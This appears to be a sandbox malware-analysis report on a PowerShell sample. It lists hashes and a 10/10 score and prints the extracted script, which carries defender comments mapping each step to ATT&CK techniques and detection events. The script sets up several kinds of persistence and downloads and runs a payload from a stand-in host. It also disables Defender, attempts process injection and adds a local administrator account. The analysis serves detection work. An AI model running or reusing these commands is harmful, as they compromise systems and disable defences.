Static task
static1
Behavioral task
behavioral1
Sample
code.ps1
Resource
win7-20240704-en
windows7-x64
9 signatures
150 seconds
Behavioral task
behavioral2
Sample
code.ps1
Resource
win10v2004-20240802-en
windows10-2004-x64
10 signatures
150 seconds
General
-
Target
code.ps1
-
Size
3KB
-
MD5
259ad591b830b483e84b4f995f35838e
-
SHA1
39be4b78a4f7d7956d21a6917f1687dc77d7847b
-
SHA256
865c27bc6fd0781cec11c4d0c0797e370a2e88f9db9f9aa25a72de7817a428fd
-
SHA512
b4eeff16b50c6b0f60fcc21a70b5a95358f8b3399fc6a08576b5e3751489462daf373be789832cefedb73fe07f959c33c499ff9f32b5e6da54f57061140c32ee
Score
10/10
Malware Config
Extracted
Language
ps1
Source
# NOTE(review): sandbox sample. This is a persistence / injection template rather
# than a finished payload — the script paths, the download URL, the shellcode
# string and the "exploit" type are placeholders, so several steps cannot run
# as written. What matters for a defender is the set of techniques it strings
# together and the telemetry each one leaves behind; that is what the comments
# below describe.

# Create a persistent scheduled task
# Task Scheduler persistence (ATT&CK T1053.005): a boot-time task that launches
# powershell.exe with -ExecutionPolicy Bypass against a fixed script path.
# -AllowStartIfOnBatteries / -DontStopIfGoingOnBatteries / -StartWhenAvailable
# keep the task from being skipped on laptops. Registration is visible as
# Security event 4698 (scheduled task created) and in the
# Microsoft-Windows-TaskScheduler/Operational log.
$taskName = "MaliciousTask"
$taskAction = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-NoProfile -ExecutionPolicy Bypass -File C:\Path\To\MaliciousScript.ps1"
$taskTrigger = New-ScheduledTaskTrigger -AtStartup
$taskSettings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -StartWhenAvailable
Register-ScheduledTask -TaskName $taskName -Action $taskAction -Trigger $taskTrigger -Settings $taskSettings

# Create a registry key for persistence
# HKCU Run-key persistence (T1547.001). The value lives in the user hive, so no
# elevation is required. Sysmon event 13 (RegistryEvent, value set) on
# ...\CurrentVersion\Run, or a periodic autoruns diff, catches this.
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "MaliciousRegistryEntry" -Value "powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Path\To\MaliciousScript.ps1"

# Download and execute a payload from a remote server
# Ingress tool transfer (T1105) over plain HTTP followed by execution of the
# dropped PE from C:\Windows\Temp. The URL below is the single indicator the
# sandbox extracted from this sample (listed as exe.dropper in the report);
# DNS/proxy logs and a new executable appearing under Windows\Temp are the
# detection points. Invoke-WebRequest here also sets no timeout and does no
# integrity check on what it fetched.
$payloadUrl = "http://malicious-server.com/payload.exe"
$downloadPath = "C:\Windows\Temp\payload.exe"
Invoke-WebRequest -Uri $payloadUrl -OutFile $downloadPath
Start-Process -FilePath $downloadPath -NoNewWindow

# Disable Windows Defender
# Impair defenses (T1562.001). Defender records this as event 5001 (real-time
# protection disabled) / 5007 (configuration changed) in the
# Microsoft-Windows-Windows Defender/Operational log; with Tamper Protection
# on, the call is rejected rather than applied.
Set-MpPreference -DisableRealtimeMonitoring $true

# Escalate privileges using a known vulnerability
# No exploit is actually present. The here-string holds a lone P/Invoke
# signature (VirtualAlloc) with no enclosing class, which is not a valid
# standalone C# type definition, and the type/method invoked afterwards are
# placeholder names. The pattern is still a useful signal: Add-Type compiles
# at runtime, so powershell.exe spawning csc.exe and dropping .cs/.dll files in
# the user's temp directory is the thing to alert on.
$exploitCode = @"
[DllImport("kernel32.dll", SetLastError = true)]
static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
"@
Add-Type -TypeDefinition $exploitCode -Language CSharp
[YourNamespace.YourClass]::YourExploitMethod()

# Execute a payload with elevated privileges
# -Verb runAs asks for elevation through UAC — a consent prompt, not a bypass —
# so this step is interactive unless UAC is already off.
Start-Process -FilePath "C:\Path\To\ElevatedPayload.exe" -Verb runAs

# Inject malicious code into a legitimate process
# Process injection (T1055) aimed at explorer.exe. As written this section does
# not execute: the shellcode is a placeholder string, and the final two lines
# call members that System.Diagnostics.ProcessThread does not expose. The
# surrounding sequence — Get-Process on a well-known host process, then
# Marshal.AllocHGlobal + Marshal.Copy of a Base64-decoded buffer — is the
# script-block-logging (event 4104) pattern worth matching on.
$process = Get-Process -Name "explorer"
$pid = $process.Id
$shellcode = [System.Convert]::FromBase64String("YourEncodedShellcodeHere")
$ptr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($shellcode.Length)
[System.Runtime.InteropServices.Marshal]::Copy($shellcode, 0, $ptr, $shellcode.Length)
$remoteThread = [System.Diagnostics.Process]::GetProcessById($pid).Threads[0].Id
[System.Diagnostics.Process]::GetProcessById($pid).Threads[0].Inject($ptr)

# Add a persistence mechanism via WMI
# WMI event subscription (T1546.003): an __EventFilter that fires on
# explorer.exe process creation and an ActiveScriptEventConsumer whose
# ScriptText is a placeholder call. Sysmon events 19 (WmiEventFilter) and 20
# (WmiEventConsumer) record the objects as they are created; they can also be
# enumerated directly under the root\subscription namespace.
Set-WmiInstance -Namespace "root\subscription" -Class "__EventFilter" -Arguments @{ Name = "WMITrigger"; Query = "SELECT * FROM __InstanceCreationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_Process' AND TargetInstance.Name = 'explorer.exe'"; QueryLanguage = "WQL"; EventNamespace = "root\cimv2" }
Set-WmiInstance -Namespace "root\subscription" -Class "ActiveScriptEventConsumer" -Arguments @{ Name = "MaliciousConsumer"; ScriptingEngine = "VBScript"; ScriptText = "ExecutePayload()" }

# Create a new user and add to the administrators group
# Local account creation (T1136.001) with a hard-coded password passed on the
# command line, so the credential shows up verbatim in process-creation
# telemetry (Security 4688 with command-line auditing, Sysmon event 1).
# Security events 4720 (account created) and 4732 (member added to a
# security-enabled local group) are the authoritative records.
net user MaliciousUser P@ssw0rd /add
net localgroup administrators MaliciousUser /add

# Ensure the script runs on reboot
# Startup-folder shortcut (T1547.001) built through the WScript.Shell COM
# object: a .lnk whose TargetPath is powershell.exe and whose Arguments carry
# the same -ExecutionPolicy Bypass -File line used by the task and Run key
# above. A new .lnk under %APPDATA%\...\Start Menu\Programs\Startup, and
# powershell.exe loading the WScript.Shell COM server, are the signals.
$startUpPath = "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\malicious.lnk"
$wScript = New-Object -ComObject WScript.Shell
$shortCut = $wScript.CreateShortcut($startUpPath)
$shortCut.TargetPath = "powershell.exe"
$shortCut.Arguments = "-NoProfile -ExecutionPolicy Bypass -File C:\Path\To\MaliciousScript.ps1"
$shortCut.Save()

# Trigger an exploit within the system
# Base64 round-trip feeding Invoke-Expression (T1059.001 with a thin T1027
# layer). The encode/decode here is applied to the literal string
# "exploit.ps1", so it adds no real obfuscation; Script Block Logging (event
# 4104) records the decoded text handed to Invoke-Expression regardless of
# the encoding step.
$exploitScript = "exploit.ps1"
$encodedCommand = [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($exploitScript))
Invoke-Expression $([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($encodedCommand)))
URLs
exe.dropper
http://malicious-server.com/payload.exe
Signatures
Files
-
code.ps1.ps1